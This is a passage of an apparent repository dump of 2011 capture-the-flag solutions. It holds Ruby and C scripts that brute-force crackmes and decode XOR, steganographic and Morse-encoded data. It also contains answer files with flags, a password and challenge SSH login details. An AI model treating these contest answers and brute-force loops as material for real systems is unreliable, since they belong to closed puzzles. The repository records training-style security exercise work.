Digest::MD5.hexdigest(File.read(fname)) 13 | if sums[sum] 14 | puts "rm #{fname}" 15 | File.unlink fname 16 | end 17 | end 18 | -------------------------------------------------------------------------------- /2011.defcon19-quals/f400/wad_ddtek.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.defcon19-quals/f400/wad_ddtek.bin -------------------------------------------------------------------------------- /2011.defcon19-quals/f400/wad_jailbreakme.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.defcon19-quals/f400/wad_jailbreakme.bin -------------------------------------------------------------------------------- /2011.hacklu/100.python.crackme/brute.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | STDOUT.sync = true 4 | 5 | def check a,d,e,f,i 6 | return if 3*a + 12*d + e + 4*f + 6*i != 2194 7 | return if -6*a + 2*d - 4*e - f + 9*i != -243 8 | return if a + 6*d + 2*e + 7*f +11*i != 2307 9 | return if 5*a - 2*d - 7*e +76*f + 8*i != 8238 10 | return if 2*a - 2*d - 2*e - 2*f + 2*i != -72 11 | puts [a,0,0,d,e,f,0,0,i].join(' ') 12 | end 13 | 14 | 15 | while(true) do 16 | check rand(256), rand(256), rand(256), rand(256), rand(256), 17 | end 18 | 19 | puts "[.] rand fail" 20 | 21 | 0.upto(255) do |a| 22 | 0.upto(255) do |d| 23 | 0.upto(255) do |e| 24 | 0.upto(255) do |f| 25 | 0.upto(255) do |i| 26 | check a,d,e,f,i 27 | end 28 | end 29 | end 30 | end 31 | end 32 | -------------------------------------------------------------------------------- /2011.hacklu/100.python.crackme/crackme.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/100.python.crackme/crackme.pyc -------------------------------------------------------------------------------- /2011.hacklu/100.python.crackme/solve.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | class String 4 | def xor x 5 | if x.is_a?(String) 6 | r = '' 7 | j = 0 8 | 0.upto(self.size-1) do |i| 9 | r << (self[i].ord^x[j].ord).chr 10 | j+=1 11 | j=0 if j>= x.size 12 | end 13 | r 14 | else 15 | r = '' 16 | 0.upto(self.size-1) do |i| 17 | r << (self[i].ord^x).chr 18 | end 19 | r 20 | end 21 | end 22 | end 23 | 24 | s = "\x0fp4$-\x064l?\x06 o!h\x17t3`\x10" 25 | 0.upto(255) do |x| 26 | s1 = s.xor(x) 27 | p s1 if s1[/^[\x20-\x7f]+$/] 28 | end 29 | -------------------------------------------------------------------------------- /2011.hacklu/100.scotty.last.signal+/0_mario.nes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/100.scotty.last.signal+/0_mario.nes -------------------------------------------------------------------------------- /2011.hacklu/100.scotty.last.signal+/1.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # get roms from http://www.emu-land.net/consoles/dendy/roms/top 4 | 5 | Dir['orig/*.nes'].each do |fname| 6 | system %Q|fc.rb "#{fname}" mario.nes > "#{fname}.fc"| 7 | end 8 | -------------------------------------------------------------------------------- /2011.hacklu/100.scotty.last.signal+/2_original_game.nes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/100.scotty.last.signal+/2_original_game.nes -------------------------------------------------------------------------------- /2011.hacklu/100.scotty.last.signal+/3_fc2bin.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | data = File.read(ARGV[0]).strip. 3 | split("\n"). 4 | map{ |x| x.split(' ')[2] }. 5 | map{ |x| x.to_i(16).chr }. 6 | join 7 | print data 8 | -------------------------------------------------------------------------------- /2011.hacklu/100.scotty.last.signal+/4_bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/100.scotty.last.signal+/4_bin -------------------------------------------------------------------------------- /2011.hacklu/100.scotty.last.signal+/5_add.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | class String 4 | def add x 5 | r = '' 6 | 0.upto(self.size-1) do |i| 7 | begin 8 | r << (self[i].ord+x).chr 9 | rescue RangeError 10 | r << self[i].chr 11 | end 12 | end 13 | r 14 | end 15 | end 16 | 17 | data = File.read('4_bin').force_encoding('binary') 18 | -255.upto(255).each do |x| 19 | r=data.add(x) 20 | puts r if r['HELP'] 21 | end 22 | -------------------------------------------------------------------------------- /2011.hacklu/100.scotty.last.signal+/ANSWER: -------------------------------------------------------------------------------- 1 | IAMSTILLALIVEHELPME 2 | -------------------------------------------------------------------------------- /2011.hacklu/150.borg.binary/README: -------------------------------------------------------------------------------- 1 | дан бинарник borgbinary 2 | он читает из stdout 4 байта, считает от них MD5 3 | и пытается выполнить то что получилось как код внутри себя. 4 | 5 | NOT SOLVED 6 | -------------------------------------------------------------------------------- /2011.hacklu/150.borg.binary/borgbinary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/150.borg.binary/borgbinary -------------------------------------------------------------------------------- /2011.hacklu/150.borg.binary/gen.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require 'timeout' 3 | require 'digest/md5' 4 | 5 | TBL = ("\x21".."\x7e").to_a.join 6 | p TBL 7 | 8 | puts "[.] #{TBL.size} chars" 9 | 10 | s="____" 11 | 0.upto(TBL.size-1) do |i| 12 | s[0] = TBL[i] 13 | 0.upto(TBL.size-1) do |j| 14 | s[1] = TBL[j] 15 | 0.upto(TBL.size-1) do |k| 16 | s[2] = TBL[k] 17 | 0.upto(TBL.size-1) do |l| 18 | s[3] = TBL[l] 19 | print "\r#{s}" 20 | r = nil 21 | begin 22 | Timeout::timeout(1) { r = system("./borgbinary", s) } 23 | rescue Timeout::Error 24 | end 25 | if r 26 | puts "[*] #{s.inspect} #{Digest::MD5.hexdigest(s)}" 27 | end 28 | end 29 | end 30 | end 31 | end 32 | 33 | -------------------------------------------------------------------------------- /2011.hacklu/150.borg.binary/hash.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "hexdump.h" 3 | 4 | int main(int argc, char*argv[]){ 5 | char buf[0x200]; 6 | char result[0x200]; 7 | char v3[0x10]; 8 | MHASH thread; // v5 9 | int v2; 10 | 11 | if(argc <= 1){ 12 | puts("no args!"); 13 | return; 14 | } 15 | 16 | if(strlen(argv[1])<100){ 17 | printf("[?] maybe i need %d chars more\n", 100-strlen(argv[1])); 18 | } 19 | 20 | bzero(buf,sizeof(buf)); 21 | bzero(result,sizeof(result)); 22 | bzero(v3,sizeof(v3)); 23 | 24 | memcpy(buf,argv[1],100); 25 | memset(v3,0,5); 26 | strncpy(v3,argv[1],4); 27 | 28 | printf("[.] v3 = %s\n",v3); 29 | 30 | thread = mhash_init(1); 31 | if(!thread) exit(1); 32 | v2 = strlen(v3); 33 | printf("[.] updating hash with %d bytes of data\n",v2); 34 | mhash(thread, v3, v2); 35 | mhash_deinit(thread, result); 36 | 37 | hexdump(result,16); 38 | 39 | // call result 40 | 41 | return 0; 42 | } 43 | -------------------------------------------------------------------------------- /2011.hacklu/200.simplexor+/solve.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require 'open-uri' 3 | 4 | URL = 'http://insecure.org/stf/smashstack.html' 5 | 6 | class String 7 | def xor x 8 | if x.is_a?(String) 9 | r = '' 10 | j = 0 11 | 0.upto(self.size-1) do |i| 12 | r << (self[i].ord^x[j].ord).chr 13 | j+=1 14 | j=0 if j>= x.size 15 | end 16 | r 17 | else 18 | r = '' 19 | 0.upto(self.size-1) do |i| 20 | r << (self[i].ord^x).chr 21 | end 22 | r 23 | end 24 | end 25 | end 26 | 27 | data1 = File.read('simplexor.txt').unpack('m*')[0] 28 | data2 = open(URL).read.force_encoding('binary')[/
.+<\/pre>/mi].
29 |   sub(/
/i,'').
30 |   sub(/<\/pre>/i,'').
31 |   strip
32 | 
33 | puts data1[0,64].xor(data2)
34 | 


--------------------------------------------------------------------------------
/2011.hacklu/200.unknown.planet+/0_8c4f14e28155a2c3cf4b2538c1e0958b.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/200.unknown.planet+/0_8c4f14e28155a2c3cf4b2538c1e0958b.jpg


--------------------------------------------------------------------------------
/2011.hacklu/200.unknown.planet+/1_analyze_jpeg:
--------------------------------------------------------------------------------
1 | look for "0xFF 0xD9" JPEG EOF mark
2 | => found data after mark
3 | => unzip filename.jpg
4 | => got 9 chunks (see chunks subdir)
5 | 


--------------------------------------------------------------------------------
/2011.hacklu/200.unknown.planet+/2_manually_guess_chunk_order.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | STDOUT.sync = true
 3 | 
 4 | if ARGV.size == 0
 5 |   raise "gimme at least one chunk filename"
 6 | end
 7 | 
 8 | b0 = "\x80"*8
 9 | b1 = "\x27\x01\x27\x80\xd9\xff\xd9\x80"
10 | 
11 | data = ARGV.map{ |x| File.read(x) }.join.force_encoding('binary')
12 | if data[0,4] == 'RIFF'
13 |   data = data[44..-1]
14 | end
15 | 
16 | N=120
17 | 
18 | b0 = b0*N
19 | b1 = b1*N
20 | 
21 | r = ''
22 | 0.step(data.size-1,b0.size) do |i|
23 |   case (d=data[i,b0.size])
24 |   when b0
25 |     print "."
26 |     r << '0'
27 |   when b1
28 |     print "#"
29 |     r << '1'
30 |   else
31 |     raise "SYNC ERROR" if d.size == b0.size
32 |     raise "NOT ENOUGH DATA #{d.size}/#{b0.size}"
33 |     raise "unknown #{d.size} (normal: #{b0.size}) bytes of data #{d.split('').map{|x| "%02x " % x.ord}.join}"
34 |   end
35 | end
36 | 


--------------------------------------------------------------------------------
/2011.hacklu/200.unknown.planet+/3_decode.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | 
 3 | STDOUT.sync = true
 4 | 
 5 | b0 = "\x80"*8
 6 | b1 = "\x27\x01\x27\x80\xd9\xff\xd9\x80"
 7 | 
 8 | data = Dir['chunks/chunk*'].sort.map{ |x| File.read(x).force_encoding('binary') }.join
 9 | if data[0,4] == 'RIFF'
10 |   data = data[44..-1]
11 | end
12 | 
13 | N=120
14 | 
15 | b0 = b0*N
16 | b1 = b1*N
17 | 
18 | r = ''
19 | n = 0
20 | 0.step(data.size-1, b0.size) do |i|
21 |   case (d=data[i,b0.size])
22 |   when b0
23 |     print "."
24 |     r << '.'
25 |   when b1
26 |     print "#"
27 |     r << '#'
28 |   else
29 |     raise "SYNC ERROR" if d.size == b0.size
30 |     raise "NOT ENOUGH DATA #{d.size}/#{b0.size}"
31 |     raise "unknown #{d.size} (normal: #{b0.size}) bytes of data #{d.split('').map{|x| "%02x " % x.ord}.join}"
32 |   end
33 |   n += 1
34 | #  puts if n%24==0
35 | end
36 | 
37 | require 'morse'
38 | 
39 | puts
40 | puts Morse.decode(r.gsub('......'," ").gsub('######','-').gsub('.','').gsub('##','.'))
41 | 


--------------------------------------------------------------------------------
/2011.hacklu/200.unknown.planet+/ANSWER:
--------------------------------------------------------------------------------
1 | Pheikyos
2 | 


--------------------------------------------------------------------------------
/2011.hacklu/200.unknown.planet+/chunks/chunk.0.uvlSlG3Tgow:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/200.unknown.planet+/chunks/chunk.0.uvlSlG3Tgow


--------------------------------------------------------------------------------
/2011.hacklu/200.unknown.planet+/chunks/chunk.1.5IIUED7GheR:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/200.unknown.planet+/chunks/chunk.1.5IIUED7GheR


--------------------------------------------------------------------------------
/2011.hacklu/200.unknown.planet+/chunks/chunk.2.rySOWi4fZkA:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/200.unknown.planet+/chunks/chunk.2.rySOWi4fZkA


--------------------------------------------------------------------------------
/2011.hacklu/200.unknown.planet+/chunks/chunk.3.87F1s5POUJc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/200.unknown.planet+/chunks/chunk.3.87F1s5POUJc


--------------------------------------------------------------------------------
/2011.hacklu/200.unknown.planet+/chunks/chunk.4.6JXtwsTTh9k:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/200.unknown.planet+/chunks/chunk.4.6JXtwsTTh9k


--------------------------------------------------------------------------------
/2011.hacklu/200.unknown.planet+/chunks/chunk.5.Uw105aD3qYh:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/200.unknown.planet+/chunks/chunk.5.Uw105aD3qYh


--------------------------------------------------------------------------------
/2011.hacklu/200.unknown.planet+/chunks/chunk.6.BPiIOASG_Z6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/200.unknown.planet+/chunks/chunk.6.BPiIOASG_Z6


--------------------------------------------------------------------------------
/2011.hacklu/200.unknown.planet+/chunks/chunk.7.Yui5oq58hlx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/200.unknown.planet+/chunks/chunk.7.Yui5oq58hlx


--------------------------------------------------------------------------------
/2011.hacklu/200.unknown.planet+/chunks/chunk.8.nLPA8X0UJqf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/200.unknown.planet+/chunks/chunk.8.nLPA8X0UJqf


--------------------------------------------------------------------------------
/2011.hacklu/250.romulan.business.network/Gwl4U5fqQZlJxEpPlgFL0hRNQrG4mmhg.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/250.romulan.business.network/Gwl4U5fqQZlJxEpPlgFL0hRNQrG4mmhg.pdf


--------------------------------------------------------------------------------
/2011.hacklu/300.antique.space.shuttle+/exploit_sources.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/300.antique.space.shuttle+/exploit_sources.zip


--------------------------------------------------------------------------------
/2011.hacklu/300.antique.space.shuttle+/remote_homedir/auth:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/300.antique.space.shuttle+/remote_homedir/auth


--------------------------------------------------------------------------------
/2011.hacklu/300.antique.space.shuttle+/remote_homedir/info:
--------------------------------------------------------------------------------
1 | Ok so you got access, now try to get more privileges by exploiting
2 | the auth protocol. you can login to ssh at port 2004
3 | with user:user4422
4 | 


--------------------------------------------------------------------------------
/2011.hacklu/300.deathstar.escape+/sample.mp3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.hacklu/300.deathstar.escape+/sample.mp3


--------------------------------------------------------------------------------
/2011.hacklu/300.deathstar.escape+/save_mp3.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | require 'open-uri'
 3 | 
 4 | while true do
 5 |   r = `echo foo | nc ctf.hack.lu 2007`
 6 |   r.force_encoding 'binary'
 7 |   r.sub!(/010 Welcome, stranger\. Please prove that you are human\s*/m,'')
 8 |   puts r.size
 9 |   tags = r.scan(/tag[a-z0-9]*/i)
10 |   p tags
11 | 
12 |   File.open 'data.mp3','w' do |f|
13 |     f<
5 | decode it with Ascii85 => I_L0v3_D0kdo
6 | 


--------------------------------------------------------------------------------
/2011.isec/q02+/dokdo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.isec/q02+/dokdo.png


--------------------------------------------------------------------------------
/2011.isec/q02+/time_machine.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | :1
3 | time 19:00:00
4 | goto 1


--------------------------------------------------------------------------------
/2011.isec/q06+/answer:
--------------------------------------------------------------------------------
1 | IsEC3352217852
2 | pAsswOrD Is : w0wH5C6Er
3 | 


--------------------------------------------------------------------------------
/2011.isec/q09+/README:
--------------------------------------------------------------------------------
1 | 1. Открываем lol.pcap в wireshark
2 | 2. follow UDP stream
3 | 3. важно выбрать только одно направление потока! иначе будет треск
4 | 4. save to file
5 | 5. audacious -> import raw file -> a-Law 8000 Hz
6 | 


--------------------------------------------------------------------------------
/2011.isec/q09+/del.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | data = File.read(ARGV[0]).force_encoding('binary')
 3 | 
 4 | File.open(ARGV[1],'w') do |f|
 5 |   f << data.
 6 |     gsub(/\x80[\x08\x88]..../m,'').
 7 |     gsub(/\x00+/m,'').
 8 |     gsub(/...bC/m,'').
 9 |     gsub(/..2x../m,'').
10 | #    gsub(/\xd5/m,'').
11 |     gsub(/\x00/m,'')
12 | end
13 | 


--------------------------------------------------------------------------------
/2011.isec/q09+/dump.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | 
 3 | puts ""
 4 | puts ""
 5 | 
 6 | data = File.read(ARGV[0]).force_encoding('binary')
 7 | (0..10000).each do |i|
 8 |   puts "
"
 9 | end
10 | 


--------------------------------------------------------------------------------
/2011.isec/q09+/lol.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.isec/q09+/lol.pcap


--------------------------------------------------------------------------------
/2011.isec/q09+/repl.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | data = File.read ARGV[0]
 3 | data.force_encoding 'binary'
 4 | 
 5 | s1 = "\xd5".force_encoding('binary')
 6 | s2 = "\x00".force_encoding('binary')
 7 | 
 8 | data.tr! s1,s2
 9 | #data.tr! "\x55",""
10 | 
11 | File.open(ARGV[1],'w'){ |f| f << data }
12 | 


--------------------------------------------------------------------------------
/2011.isec/q09+/result.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.isec/q09+/result.wav


--------------------------------------------------------------------------------
/2011.isec/q09+/s1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.isec/q09+/s1


--------------------------------------------------------------------------------
/2011.isec/q09+/s1.del:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.isec/q09+/s1.del


--------------------------------------------------------------------------------
/2011.isec/q09+/s2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.isec/q09+/s2


--------------------------------------------------------------------------------
/2011.isec/q09+/s2.del:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.isec/q09+/s2.del


--------------------------------------------------------------------------------
/2011.isec/q09+/test2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.isec/q09+/test2


--------------------------------------------------------------------------------
/2011.ructf-quals/cry300/0_cry300.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.ructf-quals/cry300/0_cry300.png


--------------------------------------------------------------------------------
/2011.ructf-quals/cry300/1_cry300_deblock_rgb.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.ructf-quals/cry300/1_cry300_deblock_rgb.png


--------------------------------------------------------------------------------
/2011.ructf-quals/cry300/4_b64_to_spl.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | 
 3 | class String
 4 |   def revert2!
 5 |     0.step(self.size-2,2) do |i|
 6 |       self[i+1],self[i] = self[i],self[i+1]
 7 |     end
 8 |     self
 9 |   end
10 | end
11 | 
12 | puts File.read(ARGV[0]).unpack('m*')[0].revert2!
13 | 


--------------------------------------------------------------------------------
/2011.ructf-quals/cry300/7_after_spl2c.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.ructf-quals/cry300/7_after_spl2c.c


--------------------------------------------------------------------------------
/2011.ructf-quals/cry300/8_ANSWER:
--------------------------------------------------------------------------------
1 | 11O2FTC
2 | 


--------------------------------------------------------------------------------
/2011.ructf-quals/cry300/spl-1.2.1.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.ructf-quals/cry300/spl-1.2.1.tar.gz


--------------------------------------------------------------------------------
/2011.ructf-quals/rev200/README:
--------------------------------------------------------------------------------
1 | образ прошивки для AVR который на LCD дисплей неизвестной марки выводит код
2 | дизасмится IDA'ой, находится знакогенератор (см. key.txt в конце), и вывод символов
3 | можно эмулировать через avrsimulatoridesetup151.exe
4 | 


--------------------------------------------------------------------------------
/2011.ructf-quals/rev200/avrsimulatoridesetup151.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.ructf-quals/rev200/avrsimulatoridesetup151.exe


--------------------------------------------------------------------------------
/2011.ructf-quals/rev200/bin2font.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/ruby
 2 | data = File.read('key.bin')
 3 | i=1
 4 | data.each_byte do |b|
 5 |   s = "%08b" % b
 6 |   puts s.tr('01','.#')
 7 |   if i==8
 8 |     #puts
 9 |     i=0
10 |   end
11 |   i+=1
12 | end
13 | 


--------------------------------------------------------------------------------
/2011.ructf-quals/rev200/fc.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/ruby
 2 | # simple binary file compare (c) http://zed.0xff.me
 3 | # like good old DOS "fc /b"
 4 | 
 5 | if ARGV.size < 2
 6 |   puts("[!] gimme at least two filenames")
 7 |   exit
 8 | end
 9 | 
10 | handles = ARGV.map{ |fname| open(fname) }
11 | 
12 | while !handles.any?(&:eof)
13 |   bytes = handles.map(&:readbyte)
14 |   if bytes.uniq.size > 1
15 |     @diff = true
16 |     printf "%08x:"+" %02x"*handles.size+"\n", handles[0].pos-1, *bytes
17 |   end
18 | end
19 | 
20 | unless handles.all?(&:eof)
21 |   @diff = true
22 |   puts
23 |   ARGV.each do |fname|
24 |     printf "[!] %20s is %8d bytes long\n", fname, File.size(fname)
25 |   end
26 | end
27 | 
28 | puts "[.] all files are identical" unless @diff
29 | 


--------------------------------------------------------------------------------
/2011.ructf-quals/rev200/hex2bin.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/ruby
 2 | data = File.read(ARGV.first)
 3 | a = ''
 4 | data.strip.split("\n").each do |l|
 5 |   l.strip!
 6 |   if l =~ /^:100/
 7 |   else
 8 |     $stderr.puts "[?] #{l}"
 9 |     next
10 |   end
11 |   l.sub! /^:100...../,''
12 |   l = l[0..-3]
13 |   (0..15).each do |i|
14 |     a << l[i*2,2].to_i(16).chr
15 |   end
16 | end
17 | $stdout << a
18 | 


--------------------------------------------------------------------------------
/2011.ructf-quals/rev200/key.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.ructf-quals/rev200/key.bin


--------------------------------------------------------------------------------
/2011.ructf-quals/rev200/mem.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.ructf-quals/rev200/mem.bin


--------------------------------------------------------------------------------
/2011.ructf-quals/rev300/README:
--------------------------------------------------------------------------------
1 | что-то как-то считается, надо получить 89.5% (примерно, точно уже не вспомню)
2 | брутом подобралось удачно
3 | 


--------------------------------------------------------------------------------
/2011.ructf-quals/rev300/brute.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/ruby
 2 | @chars = "23456789TJQKAhscd "
 3 | 
 4 | def check c
 5 |   system "echo #{c}44444 | wine pe1.exe"
 6 |   r = $?.exitstatus
 7 |   printf "[.] %10s : %d %s\n", c, r, "*"*r if r>6
 8 |   r
 9 | end
10 | 
11 | def loop s0=""
12 |   @chars.each_char do |c|
13 |     s = s0 + c
14 |     r = check s
15 |     if r >= s.size
16 |       print "\r#{s}: #{r}"
17 |       loop s
18 |     end
19 |   end
20 | end
21 | 
22 | loop
23 | 


--------------------------------------------------------------------------------
/2011.ructf-quals/rev300/pe.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.ructf-quals/rev300/pe.exe


--------------------------------------------------------------------------------
/2011.ructf-quals/rev300/pe1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.ructf-quals/rev300/pe1.exe


--------------------------------------------------------------------------------
/2011.ructf-quals/rev300/shuffle.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/ruby
 2 | @chars = "23456789TJQKAhscd "
 3 | 
 4 | def check c
 5 |   system "echo #{c}44444 | wine pe1.exe"
 6 |   r = $?.exitstatus
 7 |   printf "[.] %10s : %d %s\n", c, r, "*"*r if r>6
 8 |   r
 9 | end
10 | 
11 | def loop s0=""
12 |   @chars.each_char do |c|
13 |     s = s0 + c
14 |     r = check s
15 |     if r >= s.size
16 |       print "\r#{s}: #{r}"
17 |       loop s
18 |     end
19 |   end
20 | end
21 | 
22 | ac = @chars.split('')
23 | while true do
24 |   s = ac.shuffle.join
25 |   r = check s
26 |   print "\r#{s}: #{r}" if r > 2
27 | end
28 | 


--------------------------------------------------------------------------------
/2011.ructf/rev200/README:
--------------------------------------------------------------------------------
1 | key.hex is AVR AtMega64 (or 128) code
2 | 
3 | 1. look at key.txt at end
4 | 2. look at key.bin in hex after substring "key:"
5 | 3. look into key.idb to calls to CreateChar function
6 | 


--------------------------------------------------------------------------------
/2011.ructf/rev200/avrsimulatoridesetup151.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.ructf/rev200/avrsimulatoridesetup151.exe


--------------------------------------------------------------------------------
/2011.ructf/rev200/bin2font.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/ruby
 2 | data = File.read('key.bin')
 3 | i=1
 4 | data.each_byte do |b|
 5 |   s = "%08b" % b
 6 |   puts s.tr('01','.#')
 7 |   if i==8
 8 |     #puts
 9 |     i=0
10 |   end
11 |   i+=1
12 | end
13 | 


--------------------------------------------------------------------------------
/2011.ructf/rev200/fc.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/ruby
 2 | # simple binary file compare (c) http://zed.0xff.me
 3 | # like good old DOS "fc /b"
 4 | 
 5 | if ARGV.size < 2
 6 |   puts("[!] gimme at least two filenames")
 7 |   exit
 8 | end
 9 | 
10 | handles = ARGV.map{ |fname| open(fname) }
11 | 
12 | while !handles.any?(&:eof)
13 |   bytes = handles.map(&:readbyte)
14 |   if bytes.uniq.size > 1
15 |     @diff = true
16 |     printf "%08x:"+" %02x"*handles.size+"\n", handles[0].pos-1, *bytes
17 |   end
18 | end
19 | 
20 | unless handles.all?(&:eof)
21 |   @diff = true
22 |   puts
23 |   ARGV.each do |fname|
24 |     printf "[!] %20s is %8d bytes long\n", fname, File.size(fname)
25 |   end
26 | end
27 | 
28 | puts "[.] all files are identical" unless @diff
29 | 


--------------------------------------------------------------------------------
/2011.ructf/rev200/hex2bin.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/ruby
 2 | data = File.read(ARGV.first)
 3 | a = ''
 4 | data.strip.split("\n").each do |l|
 5 |   l.strip!
 6 |   if l =~ /^:100/
 7 |   else
 8 |     $stderr.puts "[?] #{l}"
 9 |     next
10 |   end
11 |   l.sub! /^:100...../,''
12 |   l = l[0..-3]
13 |   (0..15).each do |i|
14 |     a << l[i*2,2].to_i(16).chr
15 |   end
16 | end
17 | $stdout << a
18 | 


--------------------------------------------------------------------------------
/2011.ructf/rev200/key.bin:
--------------------------------------------------------------------------------
